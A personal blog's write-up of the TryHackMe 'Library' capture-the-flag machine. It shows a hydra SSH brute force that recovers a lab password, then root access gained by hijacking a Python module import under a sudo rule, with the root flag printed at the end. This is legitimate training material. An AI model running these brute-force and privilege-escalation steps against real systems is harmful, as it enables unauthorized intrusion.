---
layout: post
title:  "THM: Library"
date:   2021-01-02 19:45:00 +1100
category: hacking
---

## Introduction
*boot2root machine for FIT and bsides guatemala CTF*

This is [Library](https://tryhackme.com/room/bsidesgtlibrary) from THM. Like Dav, this one is ranked easy and doesn't give any hints as to what it's about. I've been away at the beach for a few days hence no hacking. In fact, these were the first days I've not done any at all for probably 6 months.

## Ports
HTTP and SSH only, on the standard ports.

## HTTP
This is where I spent the *vast* majority of the time on this box. The landing page was a very basic blog but did include a form supposedly for posting a comment. I tried an escalating series of gobusting searches but found nothing useful. 

I ran various fuzzing techniques on the the POST request with Burp Suite. I captured a request and ran it against **sqlmap**; nothing.

I downloaded a few images and ran some basic stego checks against them; nothing.

Eventually I ran *hydra* against SSH:

{% highlight shell %}
root@kali:/opt/tryhackme/bsidesgtlibrary# hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.75.13
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 03:36:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.75.13:22/
[STATUS] 151.00 tries/min, 151 tries in 00:01h, 14344249 to do in 1583:16h, 16 active
[22][ssh] host: 10.10.75.13   login: meliodas   password: iloveyou1
{% endhighlight %}

## Privesc
Presumably this was supposed to be the main challenge of this box, but it's effectively the same as Wonderland.

{% highlight shell %}
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
meliodas@ubuntu:~$ cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
meliodas@ubuntu:~$
{% endhighlight %}

So; we have a script which we can run as root that imports both **os** and **zipfile**. We can create our own version of *zipfile.py*, make it executable, and ....

{% highlight shell %}
root@ubuntu:~# cat zipfile.py 
import os
os.system("/bin/bash")
meliodas@ubuntu:~$ sudo -u root /usr/bin/python3 /home/meliodas/bak.py
root@ubuntu:~# cd /root/
root@ubuntu:/root# ls -lash
total 28K
4.0K drwx------  3 root root 4.0K Aug 24  2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 24  2019 ..
4.0K -rw-------  1 root root   43 Aug 24  2019 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwxr-xr-x  2 root root 4.0K Aug 23  2019 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   33 Aug 23  2019 root.txt
root@ubuntu:/root# cat root.txt
e8c8c6c256c35515d1d344ee0488c617
{% endhighlight %}

That was that.
